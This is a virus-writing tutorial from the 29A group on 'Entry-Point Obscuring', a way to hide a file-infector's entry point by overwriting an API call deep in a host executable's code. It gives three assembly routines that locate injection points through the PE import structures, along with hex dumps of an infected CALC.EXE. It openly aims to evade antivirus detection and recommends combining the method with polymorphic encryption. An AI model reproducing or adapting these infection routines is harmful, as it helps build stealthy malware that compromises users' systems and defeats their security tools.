;----------------------------------------------------------------------------
;EPO: Entry-Point Obscuring
;
;by GriYo / 29A
;----------------------------------------------------------------------------

In order to receive control a virus can modify an executable in several ways:

 - Modifying the entry-point field, making it point to the virus code
 - Inserting a jump to the virus over the program's code

The first way is easy, but almost every decent antivirus nowadays will mark
infected files as suspicious. The reason? A file whose entry-point is outside
the code section is, at least, suspicious.

The second way is a bit more complex. The virus can overwrite the first
instruction (the one pointed to by the entry-point field in the file header)
with a jump or call to itself. The Cabanas virus uses this method.

Using the second way the virus will fool some antivirus, but some others
still report the suspicious flag while scanning. The reason? The antivirus
looks at the code at the file entry-point and detects a jump or call outside
the code section.

We can generate some random instructions before the jump or call to virus
code. If the antivirus just looks at the first instruction it will fail to
detect the jump to the virus. The Marburg and Parvo viruses use this method,
but now this is not enough. Some antivirus can trace through this garbage
code and find the jump outside the code section, reporting the suspicious
flag again.

Solution? We have to inject a jump or call to our virus inside host code, but
far away from the file entry-point. To do this we can emulate each
instruction until we find a safe place. But wait! There is no real need for
writing a debugger-like virus. We can take advantage of the PE structure in
order to fast-scan the file looking for a place to insert a jump or call to
virus code. How?
Let's look at this dump of the CALC.EXE code section:

 01 .text
    SH_PointerToRawData   00001000
    SH_VirtualAddress     00001000
    SH_SizeOfRawData      0000C000
    SH_VirtualSize        0000BF22
    characteristics       60000020  CODE MEM_EXECUTE MEM_READ

The entry-point is at 00005D30h, and the code there looks like this:

 01285D30  64A100000000    mov eax,fs:[00000000]
 01285D36  55              push ebp
 01285D37  8BEC            mov ebp,esp
 01285D39  6AFF            push FFFFFFFF
 01285D3B  6808DF2801      push 0128DF08
 01285D40  68D4742801      push 012874D4
 01285D45  50              push eax
 01285D46  64892500000000  mov fs:[00000000],esp
 01285D4D  83EC60          sub esp,00000060
 01285D50  53              push ebx
 01285D51  56              push esi
 01285D52  57              push edi
 01285D53  8965E8          mov [ebp-18],esp
 01285D56  FF1568D02801    call [0128D068]
 01285D5C  A38CF52801      mov [0128F58C],eax
 01285D61  33C0            xor eax,eax

Skip the first instructions and go to the one at 01285D56. This instruction
takes the address stored at 0128D068 and executes the routine there. At the
mentioned address is the value 77F13FD5, which is the entry point of the
GetVersion api. So this instruction calls GetVersion.

Now look at the opcodes of this instruction:

 FF1568D02801

    15FF        CALL indirect
    0128D068    Pointer to the routine entry point

Well, nothing new so far, but let's walk the reverse way: now we want to find
a call to an api inside the program code. So take the entry point raw offset
(00005D30) and look there:

 00005D30  64 A1 00 00 00 00 55 8B
 00005D38  EC 6A FF 68 08 DF 28 01
 00005D40  68 D4 74 28 01 50 64 89
 00005D48  25 00 00 00 00 83 EC 60
 00005D50  53 56 57 89 65 E8 FF 15
 00005D58  68 D0 28 01 A3 8C F5 28
 00005D60  01 33 C0 A0 8D F5 28 01
 00005D68  A3 98 F5 28 01 A1 8C F5
 00005D70  28 01 C1 2D 8C F5 28 01
 00005D78  10 25 FF 00 00 00 A3 94
 00005D80  F5 28 01 C1 E0 08 03 05

If we scan this area looking for the CALL opcodes (FF15) we will find them at
00005D56.
After these opcodes comes a pointer to the routine entry point, let's examine
it:

 00005D58  68 D0 28 01  ->  0128D068

Let's see what's at 0128D068 in our memory image of the file:

   0128D068  -> Pointer to routine entry point
 - 01280000  -> Image base address in file header
   --------
   0000D068  -> RVA of routine entry point

Look now at this dump of the CALC.EXE imports section:

 02 .rdata
    SH_PointerToRawData   0000D000
    SH_VirtualAddress     0000D000
    SH_SizeOfRawData      00002000
    SH_VirtualSize        00001F0A
    characteristics       60000020  INITIALIZED_DATA MEM_READ

Well! It seems that we have found a way of locating calls to APIs inside the
code of the host. But the bytes FF15h do not have to belong to an API call.
They could be, for example, part of a MOV EAX,0000FF15h. How can we be sure?

We will exploit the PE structure in order to extract the name of the API
that the CALL instruction refers to. Look at the raw address corresponding to
RVA 0000D068 (in this example the RVA is equal to the raw offset).

 0000D068  24 E8 00 00

Ouch! This isn't the entry point of GetVersion (77F13FD5), but wait! Look at
offset 0000E824 in the file:

 0000E824  4C 01 47 65 74 56 65 72    L.GetVer
 0000E82C  73 69 6F 6E 00 00 6B 00    sion..k.

This is how programs import an api by name. The first word is the api 'hint'
and it is followed by the api name. In summary:

 Code section                      Imports section
 -------------------------------   -------------------------------

 01285D56 - call [0128D068]
                      ^
                      '--------->  D068 - 24 E8 00 00
                                             ^
                      ,----------------------'
                      |
                      '--------->  E824 - 4C 01
                                   E826 - "GetVersion"

Let's get to work.
The following code is a first approach to what we have just seen:

;----------------------------------------------------------------------------
;Example 1
;
;On entry:
;               ebx -> Host base address
;               ecx -> Pointer to RAW data or NULL if error
;               edx -> Entry-point RVA
;               esi -> Pointer to IMAGE_OPTIONAL_HEADER
;               edi -> Pointer to section header
;               ebp -> Virus delta offset
;
;On exit:
;               ebx -> Not changed
;               ecx -> Pointer to instruction after the api
;                      call or NULL if error
;
;----------------------------------------------------------------------------

example_1:      mov edx,dword ptr [esi+OH_ImageBase]
                mov esi,ecx
                mov ecx,dword ptr [edi+SH_VirtualSize]
                sub ecx,eax
                dec ecx
search_call:    lodsw
                dec esi
                cmp ax,15FFh
                je found_call
                loop search_call
                ret                     ;Opcode not found

found_call:     inc esi
                lodsd
                sub eax,edx
                mov edx,eax
                push esi
                call RVA2RAW
                pop esi
                jecxz e_get_code_raw
                xchg ecx,esi
                lodsd
                lea esi,dword ptr [ebx+eax]
                lodsw
                mov edx,ecx
                mov ecx,00000020h
                mov edi,esi
                xor eax,eax
IsThisStr:      scasb
                jz OhYesItIs
                loop IsThisStr
                ret                     ;Null terminator not found

OhYesItIs:      push edx                ;Ptr to next instruction
                push esi
                push dword ptr [ebp+hKERNEL32]
                call dword ptr [ebp+a_GetProcAddress]
                pop ecx
                sub ecx,ebx
                or eax,eax
                jnz e_get_code_raw
                mov ecx,eax
e_get_code_raw: ret

;End of example 1
;----------------------------------------------------------------------------

Once the virus obtains a valid pointer it can copy the instruction there into
a save buffer and patch it with a jump or call to viral code.
Using this example, the code at the CALC.EXE entry point now looks like this:

 01285D30  64A100000000    mov eax,fs:[00000000]
 01285D36  55              push ebp
 01285D37  8BEC            mov ebp,esp
 01285D39  6AFF            push FFFFFFFF
 01285D3B  6808DF2801      push 0128DF08
 01285D40  68D4742801      push 012874D4
 01285D45  50              push eax
 01285D46  64892500000000  mov fs:[00000000],esp
 01285D4D  83EC60          sub esp,00000060
 01285D50  53              push ebx
 01285D51  56              push esi
 01285D52  57              push edi
 01285D53  8965E8          mov [ebp-18],esp
 01285D56  FF1568D02801    call [0128D068]
 01285D5C  E898800000      call 0128DDF9
 01285D61  33C0            xor eax,eax

As you can see the instruction:

 01285D5C  A38CF52801      mov [0128F58C],eax

Has been overwritten by this one:

 01285D5C  E898800000      call 0128DDF9

This will push onto the stack the address of the next instruction. The virus
can pop this address in order to restore the original code there (saved while
infecting the file) and transfer control back to the host when its work is
done.

If you test it yourself you will find that the above code isn't very smart.
Let's think about how the code in example 1 works and see what happens when
handling the following code:

                jecxz label
                push ecx
                call CloseHandle
                push eax
 label:         ...

And this is how the above code looks once patched:

                jecxz label
                push ecx
                call CloseHandle
                call go2virus

The problem here is the jecxz instruction, which may transfer control
somewhere in the middle of the call to the virus. So if ecx is 00000000h our
virus won't execute, and the jecxz will jump to an invalid position.

The previous example is incorrect on purpose; it is good for showing one of
the most common pitfalls when we patch an executable. Let's modify the code
in example 1 to handle this situation.
;----------------------------------------------------------------------------
;Example 2
;
;On entry:
;               ebx -> Host base address
;               ecx -> Pointer to RAW data or NULL if error
;               edx -> Entry-point RVA
;               esi -> Pointer to IMAGE_OPTIONAL_HEADER
;               edi -> Pointer to section header
;               ebp -> Virus delta offset
;
;On exit:
;               ebx -> Not changed
;               ecx -> Inject point offset in file or NULL if error
;
;----------------------------------------------------------------------------

example_2:      mov edx,dword ptr [esi+OH_ImageBase]
                mov esi,ecx
                mov ecx,dword ptr [edi+SH_VirtualSize]
search_call:    push ecx
                lodsw
                dec esi
                cmp ax,15FFh
                jne NoCallOpcode
                push esi
                inc esi
                lodsd
                sub eax,edx
                mov edx,eax
                push esi
                call RVA2RAW
                pop esi
                jecxz NextApe
                xchg ecx,esi
                lodsd
                sub eax,edx
                lea esi,dword ptr [eax+ebx]
                lodsw
                mov edx,ecx
                mov ecx,00000020h
                mov edi,esi
                xor eax,eax
IsThisStr:      scasb
                jz FoundNull
                loop IsThisStr
NextApe:        pop esi
NoCallOpcode:   pop ecx
                loop search_call
ExitApe:        ret                     ;Opcode not found

FoundNull:      push edx
                push esi
                push dword ptr [ebp+hKERNEL32]
                call dword ptr [ebp+a_GetProcAddress]
                pop ecx
                sub ecx,ebx
                sub ecx,00000006h
                or eax,eax
                jz NextApe
                pop eax
                pop eax
                ret

;End of example 2
;----------------------------------------------------------------------------

Now we overwrite the api call with our call to the virus body, instead of
writing it after the api call. This way we will never overwrite any
instruction except the api call. Let's return to our example using CALC.EXE
as goat.
This was the original CALC.EXE code before infection:

 01285D30  64A100000000    mov eax,fs:[00000000]
 01285D36  55              push ebp
 01285D37  8BEC            mov ebp,esp
 01285D39  6AFF            push FFFFFFFF
 01285D3B  6808DF2801      push 0128DF08
 01285D40  68D4742801      push 012874D4
 01285D45  50              push eax
 01285D46  64892500000000  mov fs:[00000000],esp
 01285D4D  83EC60          sub esp,00000060
 01285D50  53              push ebx
 01285D51  56              push esi
 01285D52  57              push edi
 01285D53  8965E8          mov [ebp-18],esp
 01285D56  FF1568D02801    call [0128D068]
 01285D5C  A38CF52801      mov [0128F58C],eax
 01285D61  33C0            xor eax,eax

And this is the same code once infected using the code in example 2:

 01285D30  64A100000000    mov eax,fs:[00000000]
 01285D36  55              push ebp
 01285D37  8BEC            mov ebp,esp
 01285D39  6AFF            push FFFFFFFF
 01285D3B  6808DF2801      push 0128DF08
 01285D40  68D4742801      push 012874D4
 01285D45  50              push eax
 01285D46  64892500000000  mov fs:[00000000],esp
 01285D4D  83EC60          sub esp,00000060
 01285D50  53              push ebx
 01285D51  56              push esi
 01285D52  57              push edi
 01285D53  8965E8          mov [ebp-18],esp
 01285D56  E898800000      call 0128DDF3
 01285D5B  01              db 01h
 01285D5C  A38CF52801      mov [0128F58C],eax
 01285D61  33C0            xor eax,eax

Note that our injected call instruction uses fewer bytes than the api call.
As a result everything stays in its place, except for the call, which now
transfers control to our virus.

Also note that we are working with the first api call found from the entry
point to the end of the code section. But we can skip some apis until we
reach a point somewhere deep inside the code section.
Let's modify example 2 to do this:

;----------------------------------------------------------------------------
;Example 3
;
;On entry:
;               ebx -> Host base address
;               ecx -> Pointer to RAW data or NULL if error
;               edx -> Entry-point RVA
;               esi -> Pointer to IMAGE_OPTIONAL_HEADER
;               edi -> Pointer to section header
;               ebp -> Virus delta offset
;
;On exit:
;               ebx -> Not changed
;               ecx -> Inject point offset in file or NULL if error
;
;----------------------------------------------------------------------------

example_3:      mov eax,dword ptr [edi+SH_VirtualSize]
                shr eax,01h
                call get_rnd_range
                mov edx,dword ptr [esi+OH_ImageBase]
                lea esi,dword ptr [eax+ecx]
                mov ecx,dword ptr [edi+SH_VirtualSize]
                sub ecx,eax
search_call:    push ecx
                lodsw
                dec esi
                cmp ax,15FFh
                jne NoCallOpcode
                push esi
                inc esi
                lodsd
                sub eax,edx
                mov edx,eax
                push esi
                call RVA2RAW
                pop esi
                jecxz NextApe
                xchg ecx,esi
                lodsd
                sub eax,edx
                lea esi,dword ptr [eax+ebx]
                lodsw
                mov edx,ecx
                mov ecx,00000020h
                mov edi,esi
                xor eax,eax
IsThisStr:      scasb
                jz FoundNull
                loop IsThisStr
NextApe:        pop esi
NoCallOpcode:   pop ecx
                loop search_call
ExitApe:        ret                     ;Opcode not found

FoundNull:      push edx
                push esi
                push dword ptr [ebp+hKERNEL32]
                call dword ptr [ebp+a_GetProcAddress]
                pop ecx
                sub ecx,ebx
                sub ecx,00000006h
                or eax,eax
                jz NextApe
                pop eax
                pop eax
                ret

;End of example 3
;----------------------------------------------------------------------------

The above code gets a random number from 00000000h to the end of code section
size, and starts searching there for any api call. Yes, the random number
generator and the RVA2RAW routines aren't included, write your own ones.

While playing with the above stuff I found the following problems:

 - Lots of files never got infected
 - The search procedure usually exits due to exceptions

Files generated with the Borland linker do not use the calling structure we
saw before, so we have to handle them in a different way. Bound files also
need some special care.
Another *not-so-smart* part is the use of GetProcAddress to check the API
name. It would be better to check whether an RVA points inside the Import
Section.

I admit it, the above examples are pure shit, but enough to easily explain
the idea behind them. Using this method the virus entry-point will be
definitely hidden, and a virus using this plus a polymorphic engine may be
really hard to spot. If the polymorphic engine successfully produces a
completely random pattern and the entry point to this pattern of code is
unknown, the virus will be safe from lame AV detection techniques for a long
time.

I wrote the whole routine again keeping in mind all these problems. You can
find the result in the source code of the CTX-Phage virus. It shows how to
implement the "EPO" tech in conjunction with strong polymorphic encryption.

Another possibility is to locate structures generated by high level language
compilers. For instance:

 01012420  55              push ebp
 01012421  8BEC            mov ebp,esp

I leave this part to you, have fun.

-- GriYo / 29A

   I'm not in the business...
                ...I am the business